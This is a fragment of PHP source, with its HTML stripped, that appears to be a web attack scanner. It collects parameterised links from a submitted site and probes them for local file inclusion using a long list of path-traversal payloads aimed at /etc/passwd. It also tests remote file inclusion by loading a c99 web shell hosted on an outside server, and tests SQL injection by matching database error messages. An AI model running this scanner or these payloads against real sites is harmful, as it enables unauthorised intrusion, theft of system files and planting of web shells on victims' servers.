Site to test: '; $link = $_POST['scan']; preg_match('@^(?:http://)?([^/]+)@i',$link, $matches); $host = $matches[1]; function getLinks($link) { $ret = array(); $dom = new domDocument; @$dom->loadHTML(file_get_contents($link)); $dom->preserveWhiteSpace = false; $links = $dom->getElementsByTagName('a'); foreach ($links as $tag) { $ret[$tag->getAttribute('href')] = $tag->childNodes->item(0)->nodeValue; } return $ret; } if (isset($_POST["searchn"])) { echo '

'; echo "
Links found:

"; if (preg_match("/=/", $link)) { echo ''.$link.'
'; } $urls = getLinks($link); if(sizeof($urls) > 0) { foreach($urls as $key=>$value) { if (preg_match("/=/i", $key)) { if (preg_match("/.com|.net|.org|.co.uk|.com.au|.us/", $key)) { echo ''.$key.'
'; } else{ echo ''.$host.'/'.$key.'
'; } } } echo "

"; } else { echo ""; echo "No exploitable links found at $link

"; } echo "

"; } } function selected(){ echo '

'; $sites = $_POST['sites']; $n = count($sites); $i = 0; $r = 1; echo "Testing.." . "

"; while ($i < $n) { $site = "{$sites[$i]}"; $equals = strrpos($site,"="); $siteedit = substr_replace($site, '', $equals+1); echo "
$r. $siteedit
"; rfi($siteedit); lfi($siteedit); sql($siteedit); $i++; $r++; } echo "

"; echo "Test again"; } function lfi($site) { $lfifound = 0; $lfi = array( "/etc/passwd", "../etc/passwd", "../../etc/passwd", "../../../etc/passwd", "../../../../etc/passwd", "../../../../../etc/passwd", "../../../../../../etc/passwd", "../../../../../../../etc/passwd", "../../../../../../../../etc/passwd", "../../../../../../../../../etc/passwd", "../../../../../../../../../../etc/passwd", "/etc/passwd%00", "../etc/passwd%00", "../../etc/passwd%00", "../../../etc/passwd%00", "../../../../etc/passwd%00", "../../../../../etc/passwd%00", "../../../../../../etc/passwd%00", "../../../../../../../etc/passwd%00", "../../../../../../../../etc/passwd%00", "../../../../../../../../../etc/passwd%00", "../../../../../../../../../../etc/passwd%00" ); $totallfi = count($lfi); for($i=0; $i<$totallfi; $i++) { $GET = @file_get_contents("$site$lfi[$i]"); if (preg_match("/root/i",$GET, $matches)) { echo "LFI found: $site$lfi[$i]
"; $lfifound = 1; } } if ($lfifound == 0) { echo "No LFI found.
"; } } function rfi($site) { $rfifound = 0; $rfi = "http://www.evilc0der.com/c99.txt?"; $GET1 = @file_get_contents("$site$rfi"); if (preg_match("/root/i",$GET1, $matches)) { echo "RFI found: $site$rfi
"; $rfifound = 1; } if ($rfifound == 0) { echo "No RFI found.
"; } } function sql($site) { $sqlfound = 0; $sql = "99'"; $GET2 = @file_get_contents("$site$sql"); if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch?_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET2, $matches)) { echo "SQL found: $site$sql
"; $sqlfound = 1; } if ($sqlfound == 0) { echo "No SQL found.
"; } } ?>